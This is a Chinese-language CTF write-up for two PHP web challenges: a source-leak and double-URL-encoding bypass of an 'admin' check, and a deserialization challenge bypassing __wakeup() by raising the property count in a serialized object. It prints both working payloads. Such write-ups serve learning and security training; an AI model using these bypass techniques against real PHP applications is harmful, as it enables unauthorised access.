9.PHP2
根据题目,没有给出任何信息,直接是一个场景,点击打开场景页面我们发现是一串文字:Can you anthenticate to this website?
首先想到尝试index.php,未果。再尝试index.phps,成功发现了代码泄露。
.phps文件是给用户看PHP源码的文件后缀名
代码如下
<?php
if("admin"===$_GET[id]) {
echo("<p>not allowed!</p>");
exit();
}
$_GET[id] = urldecode($_GET[id]);
if($_GET[id] == "admin")
{
echo "<p>Access granted!</p>";
echo "<p>Key: xxxxxxx </p>";
}
?>
Can you anthenticate to this website?
第一个 if 如果成立的话就要退出来,显然我们要让第一个 if 不成立,就是不能上传一个变量id=admin,但是我们要让上传的这个变量id经过url解码之后等于admin,而且我们知道在当传入参数id时,浏览器在后面会对非ASCII码的字符进行一次urlencode(编码),运行时会自动进行一次urldecode(解码)
所以我们要上传的admin必须要进行两次urlencode编码
payload
?id=%2561%2564%256D%2569%256E
10.unserialize3
1.题名 unserialize 是反序列化函数名
2.了解一下什么是序列化和反序列化
当在php中创建了一个对象后,可以通过 serialize() 函数把这个对象转变成一个字符串,保存对象的值方便之后的传递与使用。与 serialize() 相反的就是反序列化函数 unserialize() ,它可以将一个字符串转变为相对应的php对象。
在序列化过程中会用到的函数:
_construct():当对象创建(new)时会自动调用。但在 unserialize() 时是不会自动调用的。(构造函数)
_destruct():当对象被销毁时会自动调用。(析构函数)
_wakeup():unserialize() 时会自动调用。
_sleep() 在对象被序列化之前运行。
_toString ()当一个对象被当作一个字符串使用。
__wakeup() 经常用在反序列化操作中,例如重新建立数据库连接,或执行其它初始化操作。
3.PHP分析
class xctf{ //定义一个名为xctf的类
public $flag = '111'; //定义一个公有的类属性$flag,值为111
public function __wakeup(){ //定义一个公有的类方法__wakeup(),输出bad requests后退出当前脚本
exit('bad requests');
}
?code= //可能是在提示我们http://111.198.29.45:30940?code=一个值进行利用
代码中的__wakeup()方法如果使用就是和unserialize()反序列化函数结合使用的,这里没有序列化字符串,何来反序列化呢?于是,我们这里实例化xctf类并对其使用序列化(这里就实例化xctf类为对象a)
<?php
class xctf{
public $flag = '111';
public function __wakeup(){
exit('bad requests');
}
}
$a = new xctf();
echo(serialize($a));
?>
//输出
O:4:"xctf":1:{s:4:"flag";s:3:"111";}
序列化后格式
O::""::{<field name 1><field value 1>…}
O:表示序列化的事对象
< length>:表示序列化的类名称长度
< class name>:表示序列化的类的名称
< n >:表示被序列化的对象的属性个数
< field name 1>:属性名
< field value 1>:属性值
4.我们要反序列化xctf类的同时还要绕过wakeup方法的执行 (如果不绕过wakeup()方法,将会输出bad requests并退出脚本)
5._wakeup()函数漏洞原理:当序列化字符串表示对象属性个数的值大于真实个数的属性时就会跳过__wakeup()的执行。
6.因此,需要修改序列化字符串中的属性个数:当我们将上述的序列化的字符串中的对象属性个数由真实值1修改为3,即如下所示
O:4:"xctf":3:{s:4:"flag";s:3:"111";}
拿到flag